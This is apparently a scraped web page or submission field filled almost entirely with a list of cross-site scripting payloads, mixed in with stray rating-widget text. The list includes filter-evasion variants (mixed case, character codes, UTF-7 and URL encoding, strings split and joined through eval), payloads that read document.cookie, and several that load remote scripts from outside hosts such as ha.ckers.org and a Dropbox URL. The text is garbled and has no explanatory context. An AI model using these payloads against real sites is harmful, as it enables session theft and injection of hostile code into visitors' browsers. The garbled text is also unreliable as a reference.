SRC=javascript:alert(String.fromCharCode(88,83,83))> <IMG \”\”\”><SCRIPT>alert(\”XSS\”)</SCRIPT>\”> <IMG SRC=`javascript:alert(\”RSnake says, ‘XSS’\”)`> <IMG SRC=javascript:alert("XSS")> <IMG SRC=JaVaScRiPt:alert(‘XSS’)> <IMG SRC=javascript:alert(‘XSS’)> <IMG SRC=\”javascript:alert(‘XSS’);\”> <SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT> ”;!–\”<XSS>=';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//\”;alert(String.fromCharCode(88,83,83))//\\”;alert(String.fromCharCode(88,83,83))//–></SCRIPT>\”>’><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT> ‘;alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//”;alert(String.fromCharCode(88,83,83))//\”;alert(String.fromCharCode(88,83,83))//–>”>’>alert(String.fromCharCode(88,83,83)) ”;!–“= alert(“XSS”)”> <alert(“XSS”);//< a=/XSS/alert(a.source) \”;alert(‘XSS’);// alert(“XSS”); ¼script¾alert(¢XSS¢)¼/script¾ @im\port’\ja\vasc\ript:alert(“XSS”)'; exp/* a=”get”;b=”URL(ja\””;c=”vascr”;d=”ipt:ale”;e=”rt(‘XSS’);\”)”;eval(a+b+c+d+e); document.write(“<SCRI");PT SRC=”http://ha.ckers.org/xss.js”> TESTHTML5FORMACTION crosssitespt <!– <img src=" alert(1)”> alert(1)”> alert(1)”> ({0:#0=alert/#0#/#0#(123)}) ReferenceError.prototype.__defineGetter__(‘name’, function(){alert(123)}),x Object.__noSuchMethod__ = Function,[{}][0].constructor._(‘alert(1)’)() {alert(1)};1 crypto.generateCRMFRequest(‘CN=0′,0,0,null,’alert(1)’,384,null,’rsa-dual-use’) alert(1) +ADw-script+AD4-alert(document.location)+ADw-/script+AD4- %2BADw-script+AD4-alert(document.location)%2BADw-/script%2BAD4- +ACIAPgA8-script+AD4-alert(document.location)+ADw-/script+AD4APAAi- %2BACIAPgA8-script%2BAD4-alert%28document.location%29%2BADw-%2Fscript%2BAD4APAAi- %253cscript%253ealert(document.cookie)%253c/script%253e “>alert(document.cookie) “>alert(document.cookie) “><alert(document.cookie);//< fooalert(document.cookie) <script>alert(document.cookie)</script> %22/%3E%3CBODY%20onload=’document.write(%22%3Cs%22%2b%22cript%20src=http://my.box.com/xss.js%3E%3C/script%3E%22)’%3E ‘; alert(document.cookie); var foo=’ foo\’; alert(document.cookie);//’; alert(document.cookie) alert(1) “>alert(String.fromCharCode(66, 108, 65, 99, 75, 73, 99, 101))" />

Our rating

Your's rating

alert(123);
alert(“XSS”);
alert(123)
alert(“hellox worldss”);
alert(“XSS”)
alert(“XSS”);
alert(‘XSS’)
“>alert(“XSS”)
alert(/XSS”)
alert(/XSS/)
alert(1)
‘; alert(1);
‘)alert(1);//
alert(1)




{font-family&colon;”

<input/onmouseover="javaSCRIPT&colon;confirm&lpar;1&rpar;"

alert&lpar;1&rpar; {Opera}

<img/src=`%00` onerror=this.onerror=confirm(1)

<isindex formaction="javascript&colon;confirm(1)"

<img src=`%00`&NewLine; onerror=alert(1)&NewLine;

prompt(1)</ScRipT giveanswerhere=?

/*%00*/alert(1)/*%00*/</script /*%00*/

">

%00

<iframe/src="data:text/html,”>

</script

<script x:href='https://dl.dropbox.com/u/13018058/js.js' {Opera}

X


X</a

http://www.googlealert(document.location)</script

XYZ</a

<img/src=@ onerror = prompt('1')

<style/onload=prompt('XSS')

alert(String.fromCharCode(49))</script ^__^

/**/alert(document.location)/**/</script :-(

&#00;